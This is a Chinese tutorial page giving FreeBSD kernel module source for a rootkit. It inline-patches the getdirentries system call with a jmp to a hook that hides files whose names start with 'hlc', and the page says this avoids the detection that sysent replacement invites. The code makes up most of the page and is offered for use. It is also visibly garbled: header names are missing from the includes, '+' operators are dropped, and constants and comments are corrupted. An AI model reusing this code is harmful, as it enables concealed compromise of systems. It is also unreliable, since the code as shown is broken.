新客网WWW.XKER.COM:致力做中国最专业的网络学院!
学院: 操作系统 - 网络应用 - 服务器 - 网络安全 - 工具软件 - 办公软件 - Web开发 - 数据库 - 网页设计 - 图形图像 - 媒体动画 - 硬件学堂 - 存储频道 - QQ专区
您的位置:首页 > 网络学院 > 操作系统 > Unix系统 > FreeBSD教程 > 正文:不直接替换系统调用的kld

不直接替换系统调用的kld

新客网 XKER.COM 2008-01-19 来源:新客网编辑整理 佚名 收藏本文

【新客网FreeBSD教程】假如在sysent表里面直接替换系统调用,很轻易被发现,我们可以通过改写系统调用的前面几个字节(jmp 新的系统调用)来达到更好的隐藏效果,而不是直接替换系统调用.

下面的代码就是具体的实现:

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include
#include
#include

MALLOC_DEFINE(HLC_DIR,"dir","struct");

#define hidename "hlc"

#define hidelength 3

unsigned char new_call_code[7]="\xb8\x00\x00\x00\x00"/* movl $0,陎 */

"\xff\xe0"; /* jmp *陎 */

unsigned char old_call_code[7];

static int filehide(char *name)

{

char buf[hidelength 1];

bcopy(name,buf,hidelength);

buf[hidelength]='\0';

if(!strcmp(buf,hidename))

return 1;

return 0;

}

static int new_getdirentries(struct proc *p,register struct getdirentries_args *uap)

{

int size,count;

struct dirent *dir,*current;

bcopy(old_call_code,sysent[SYS_getdirentries].sy_call, sizeof(old_call_code));

getdirentries(p,uap);

bcopy(new_call_code,sysent[SYS_getdirentries].sy_call, sizeof(new_call_code));

size=p->p_retval[0];

if(size>0)

{

MALLOC(dir,struct dirent *,size,HLC_DIR,M_NOWA99v);

copyin(uap->buf,dir,size);

current=dir;

count=size;

while((count>0)&&(current->d_reclen!=0))

{

count-=current->d_reclen;

if(filehide(current->d_name))

{

size-=current->d_reclen;

if(count!=0)

{

bcopy((char *)current current->d_reclen,current,count);

}

continue;

}

if(count!=0)

current=(struct dirent *)((char *)current current->d_reclen);

}

p->p_retval[0]=size;

copyout(dir,uap->buf,size);

free(dir,HLC_DIR);

}

return 0;

}

static int load( module_t *mod,int cmd,void *arg)

{

int error=0;

switch(cmd)

{

case MOD_LOAD:

{

*(long*)&new_call_code[1]=(long)new_getdirentries;

bcopy(sysent[SYS_getdirentries].sy_call,old_call_code, sizeof(old_call_code));

bcopy(new_call_code,sysent[SYS_getdirentries].sy_call, sizeof(new_call_code));

printf("install ok\n");

break;

}

case MOD_UNLOAD:

{

bcopy(old_call_code,sysent[SYS_getdirentries].sy_call, sizeof(old_call_code));

break;

}

default:

{

error=EINVAL;

break;

}

}

return error;

}

static moduledata_t addjmp_mod={

"addjmp",

load,

NULL

};

DECLARE_MODULE(addjmp,addjmp_mod,SI_SUB_DRIVERS,SI_ORDER_MIDDLE);

收藏】 【评论】 【推荐】 【投稿】 【打印】 【关闭
发表评论
要记得去论坛讨论,点击注册新会员匿名评论
评论内容:不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
阅读排行
随机推荐
实用信息推荐